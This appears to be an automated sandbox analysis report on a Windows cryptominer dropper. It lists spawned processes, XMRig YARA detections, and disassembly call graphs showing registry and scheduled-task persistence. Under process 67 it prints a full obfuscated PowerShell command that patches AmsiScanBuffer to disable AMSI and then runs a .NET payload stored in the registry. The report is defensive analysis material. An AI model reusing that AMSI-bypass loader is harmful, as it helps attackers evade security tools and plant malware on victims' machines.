                                                        Has exited:true

                                                        General

                                                        Target ID:62
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:63
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:64
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\lsass.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\lsass.exe
                                                        Imagebase:0x7ff7ac940000
                                                        File size:59'456 bytes
                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:65
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:66
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.3447887034.0000028A981B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                        Has exited:false

                                                        General

                                                        Target ID:67
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$JRxrSkXtFvoHQj=$opuJgspdjbNOB.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BKEqIqCwRefEvWHkEvb=tvJmJWkkljdL @([String])([IntPtr]);$jHKuyMaewNXWYnPAXNtVwb=tvJmJWkkljdL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TPsVJhpipYG=$opuJgspdjbNOB.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$rnQeYQPaljIZIy=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+'r'+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$baDhPfYjDHPSnZPKw=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'ua'+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$dImCJWh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rnQeYQPaljIZIy,$BKEqIqCwRefEvWHkEvb).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$VaoZSrEKYRrKpAGDt=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$dImCJWh,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$HGMKYUxWWR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,4,[ref]$HGMKYUxWWR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VaoZSrEKYRrKpAGDt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,0x20,[ref]$HGMKYUxWWR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:68
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:69
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:70
                                                        Start time:22:56:07
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dwm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"dwm.exe"
                                                        Imagebase:0x7ff68eb30000
                                                        File size:94'720 bytes
                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:71
                                                        Start time:22:56:08
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
                                                        Imagebase:0x7ff642ec0000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:72
                                                        Start time:22:56:08
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:73
                                                        Start time:22:56:09
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                        Imagebase:0x7ff7403e0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FF687BC1140 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2171946762.00007FF687BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF687BC0000, based on PE: true
                                                          • Associated: 00000000.00000002.2171881255.00007FF687BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2172049332.00007FF687BD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2172085483.00007FF687BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2172125619.00007FF687BDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2172650705.00007FF6880D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2172701763.00007FF68810C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2172725883.00007FF68810F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff687bc0000_egFMhHSlmf.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction ID: ace1dd9a2667cf07f4c2692a4ac592cd2a1418d9b14aa7b4ecec41d28160f5c5
                                                          • Opcode Fuzzy Hash: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction Fuzzy Hash: 3BB012B0D4430DC8E3012F01D88135836A1BF4A742F408034C40C57352CEBDD040CB10

                                                          Execution Graph

                                                          Execution Coverage:75.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:38.5%
                                                          Total number of Nodes:96
                                                          Total number of Limit Nodes:1
                                                          execution_graph 190 140001970 193 140001984 FindResourceExA 190->193 194 140001979 ExitProcess 193->194 195 1400019ae SizeofResource 193->195 195->194 196 1400019c3 LoadResource 195->196 196->194 197 1400019d7 LockResource RegOpenKeyExW 196->197 197->194 198 140001a0e RegSetValueExW 197->198 198->194 199 140001a34 198->199 209 140001a7c GetProcessHeap HeapAlloc StrCpyW 199->209 203 140001a48 204 1400017ec 9 API calls 203->204 205 140001a57 204->205 252 14000117c 7 API calls 205->252 207 140001a62 207->194 262 140001614 SysAllocString SysAllocString CoInitializeEx 207->262 272 14000114c GetModuleHandleA 209->272 212 140001b05 StrCatW StrCatW 275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 212->275 213 140001ad5 StrCatW StrCatW StrCatW 213->212 218 140001c0c 6 API calls 219 140001b4b 218->219 220 140001c0c 6 API calls 219->220 221 140001b5a 220->221 222 140001c0c 6 API calls 221->222 223 140001b69 222->223 224 140001c0c 6 API calls 223->224 225 140001b78 224->225 226 140001c0c 6 API calls 225->226 227 140001b87 226->227 228 140001c0c 6 API calls 227->228 229 140001b96 228->229 230 140001c0c 6 API calls 229->230 231 140001ba5 230->231 232 140001c0c 6 API calls 231->232 233 140001bb4 232->233 234 140001c0c 6 API calls 233->234 235 140001bc3 234->235 236 140001c0c 6 API calls 235->236 237 140001bd2 236->237 238 140001c0c 6 API calls 237->238 239 140001be1 238->239 240 140001c0c 6 API calls 239->240 241 140001bf0 240->241 242 140001c0c 6 API calls 241->242 243 140001a39 242->243 244 1400017ec SysAllocString SysAllocString CoInitializeEx 243->244 245 140001948 SysFreeString SysFreeString 244->245 246 14000182d CoInitializeSecurity 244->246 245->203 247 140001875 CoCreateInstance 246->247 248 140001869 246->248 249 140001942 CoUninitialize 247->249 250 1400018a4 VariantInit 247->250 248->247 248->249 249->245 251 1400018fa 250->251 251->249 253 14000120e CoInitializeSecurity 252->253 254 1400015c0 6 API calls 252->254 255 140001256 CoCreateInstance 253->255 256 14000124a 253->256 254->207 257 1400015ba CoUninitialize 255->257 258 140001287 VariantInit 255->258 256->255 256->257 257->254 260 1400012de 258->260 259 140001537 259->257 260->259 261 140001489 VariantInit VariantInit VariantInit 260->261 261->259 263 1400017c5 SysFreeString SysFreeString 262->263 264 140001655 CoInitializeSecurity 262->264 263->194 265 140001691 264->265 266 14000169d CoCreateInstance 264->266 265->266 267 1400017bf CoUninitialize 265->267 266->267 268 1400016cc VariantInit 266->268 267->263 269 140001722 268->269 270 14000175c VariantInit 269->270 271 14000178e 269->271 270->271 271->267 273 140001174 272->273 274 140001167 GetProcAddress 272->274 273->212 273->213 274->273 296 140001000 CryptAcquireContextW 275->296 278 140001b2d 289 140001c0c lstrlenW 278->289 279 140001d0d StrStrIW 280 140001f21 6 API calls 279->280 284 140001d2c 279->284 280->278 281 140001d2f StrStrIW StrNCatW StrCatW 282 140001edf StrCatW StrStrIW 281->282 281->284 282->281 283 140001f19 282->283 283->280 284->281 284->282 285 140001ebf StrCatW 284->285 286 140001e82 StrCatW StrNCatW 284->286 288 140001e5a StrCatW StrCatW 284->288 285->284 287 140001eae StrCatW 286->287 287->285 288->287 299 140001070 289->299 291 140001c45 292 140001c49 StrStrIW 291->292 293 140001b3c 291->293 292->293 294 140001c5a 292->294 293->218 295 140001c5d StrStrIW 294->295 295->293 295->295 297 140001039 CryptGenRandom CryptReleaseContext 296->297 298 14000105e 296->298 297->298 298->278 298->279 300 140001000 3 API calls 299->300 301 1400010ea 300->301 301->291 301->301

                                                          Callgraph

                                                          Executed Functions

                                                          Function 0000000140001C9C Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 196memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                          • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                          • API String ID: 3510167801-2888743547
                                                          • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                          • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                          • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300
                                                          Function 0000000140001614 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 121memorycomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                          • String ID: dialersvc64
                                                          • API String ID: 2407135876-3881820561
                                                          • Opcode ID: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction ID: d87eb2bd9d729e9729409dc9478b0812213582aedf91d7913a1da9f61deadf9a
                                                          • Opcode Fuzzy Hash: 3c97e4c5619ef6fd9796c7cadf22d1dacbe7654f614efe6a853fd620db2a3c93
                                                          • Instruction Fuzzy Hash: B6510576704A458AEB11CF7AE8843DD63B1FB88B98F444226EF4E47A29DF38C149C340
                                                          Function 0000000140001984 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                          • SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                          • LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                          • LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                            • Part of subcall function 0000000140001A7C: GetProcessHeap.KERNEL32 ref: 0000000140001A85
                                                            • Part of subcall function 0000000140001A7C: HeapAlloc.KERNEL32 ref: 0000000140001A96
                                                            • Part of subcall function 0000000140001A7C: StrCpyW.SHLWAPI ref: 0000000140001AA9
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001ADF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AEF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001AFF
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B0F
                                                            • Part of subcall function 0000000140001A7C: StrCatW.SHLWAPI ref: 0000000140001B1F
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001802
                                                            • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
                                                            • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
                                                            • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
                                                            • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
                                                            • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
                                                            • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
                                                            • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
                                                            • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
                                                            • Part of subcall function 000000014000117C: CoInitializeEx.OLE32 ref: 0000000140001200
                                                            • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
                                                            • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
                                                            • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
                                                            • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
                                                            • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
                                                            • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
                                                            • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
                                                            • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
                                                          • String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                          • API String ID: 2204944113-1859800454
                                                          • Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
                                                          • Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
                                                          • Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600
                                                          Function 0000000140001000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32encryptionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID: Microsoft Base Cryptographic Provider v1.0
                                                          • API String ID: 1815803762-291530887
                                                          • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                          • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                          • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740
                                                          Function 0000000140001A7C Relevance: 45.6, APIs: 8, Strings: 18, Instructions: 85memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
